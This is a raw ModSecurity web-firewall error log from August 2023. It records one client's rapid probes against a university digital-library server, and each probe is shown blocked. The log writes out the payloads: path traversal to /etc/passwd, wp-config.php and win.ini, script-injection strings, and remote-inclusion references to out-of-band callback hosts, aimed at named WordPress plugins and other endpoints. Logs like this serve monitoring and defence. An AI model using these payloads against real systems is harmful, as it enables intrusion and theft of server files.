[Tue Aug 29 11:54:33.549264 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16CcCo-f0AAAqeFOsAAAAx"]
[Tue Aug 29 11:54:34.603130 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:var_url: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/ecrire/"] [unique_id "ZO16CsCo-f0AAApl@A8AAAAo"]
[Tue Aug 29 11:54:34.608119 2023] [:error] [pid 2711] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stack. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stack: \\x0a<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/__nuxt_error"] [unique_id "ZO16CsCo-f0AAAqXyPsAAAAq"]
[Tue Aug 29 11:54:35.702203 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16C8Co-f0AAAqWwWsAAAAl"]
[Tue Aug 29 11:54:35.711000 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/adminimize/adminimize_page.php"] [unique_id "ZO16C8Co-f0AAApZHWsAAAAf"]
[Tue Aug 29 11:54:37.844691 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16DcCo-f0AAAnHQywAAAAT"]
[Tue Aug 29 11:54:38.666428 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16DsCo-f0AAAofnFAAAAAX"]
[Tue Aug 29 11:54:40.528715 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HImbmoU7CZyArPbLLDsM9Y5')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO16EMCo-f0AAApk-W4AAAAn"]
[Tue Aug 29 11:54:41.608612 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16EcCo-f0AAAo2nC4AAAAA"]
[Tue Aug 29 11:54:41.636797 2023] [:error] [pid 2634] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:javascript:alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:javascript:alert(document.domain): javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfkip.unla.ac.id"] [uri "/help/english/index.html"] [unique_id "ZO16EcCo-f0AAApKay8AAAAZ"]
[Tue Aug 29 11:54:44.554433 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain): a' type= 'text' autofocus onfocus='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/OneView/view/center"] [unique_id "ZO16FMCo-f0AAAqTvlAAAAAa"]
[Tue Aug 29 11:54:46.601709 2023] [:error] [pid 2634] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16FsCo-f0AAApKa0AAAAAZ"]
[Tue Aug 29 11:54:47.599641 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:operatorlocale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:operatorlocale: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.jsp"] [unique_id "ZO16F8Co-f0AAAqdboIAAAAw"]
[Tue Aug 29 11:54:50.580568 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/raygun4wp/sendtesterror.php"] [unique_id "ZO16GsCo-f0AAAqUB5MAAAAb"]
[Tue Aug 29 11:54:50.641265 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO16GsCo-f0AAAqRzEwAAAAM"]
[Tue Aug 29 11:54:51.743393 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:xing-url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:xing-url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php"] [unique_id "ZO16G8Co-f0AAApk-ZIAAAAn"]
[Tue Aug 29 11:54:51.757305 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/source/loggin/page_log_dwn_file.hsp"] [unique_id "ZO16G8Co-f0AAAoz79oAAAAS"]
[Tue Aug 29 11:54:52.612195 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:formId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:formId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/tidio-form/popup-insert-help.php"] [unique_id "ZO16HMCo-f0AAAqhN@8AAAAE"]
[Tue Aug 29 11:54:54.044352 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16HsCo-f0AAApHRaEAAAAP"]
[Tue Aug 29 11:54:55.593393 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0uggxi1318bzsj.oast.site found within TX:1: cjmnijtjmimvgniikdb0uggxi1318bzsj.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/plugins/servlet/oauth/users/icon-uri"] [unique_id "ZO16H8Co-f0AAAqWwa8AAAAl"]
[Tue Aug 29 11:54:55.767687 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16H8Co-f0AAApbUYsAAAAh"]
[Tue Aug 29 11:54:56.736962 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IMCo-f0AAAoAk9EAAAAC"]
[Tue Aug 29 11:54:58.215986 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\r\\n. [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IsCo-f0AAAoz7-IAAAAS"]
[Tue Aug 29 11:54:58.216031 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\x5cr\\x5cn."] [severity "CRITICAL"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IsCo-f0AAAoz7-IAAAAS"]
[Tue Aug 29 11:54:58.269011 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IsCo-f0AAApk-agAAAAn"]
[Tue Aug 29 11:54:59.569851 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/CMSPages/GetDocLink.ashx"] [unique_id "ZO16I8Co-f0AAAoz7-kAAAAS"]
[Tue Aug 29 11:55:00.556361 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:service. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:service: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/login/"] [unique_id "ZO16JMCo-f0AAApHRbQAAAAP"]
[Tue Aug 29 11:55:02.828542 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO16JsCo-f0AAApbUa0AAAAh"]
[Tue Aug 29 11:55:04.022012 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO16KMCo-f0AAAoz8A8AAAAS"]
[Tue Aug 29 11:55:04.528300 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-family. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-family: '/onerror='alert(document.domain)'/b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAAqRzIAAAAAM"]
[Tue Aug 29 11:55:04.645669 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' onerror=alert(document.domain) b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAApa-LEAAAAg"]
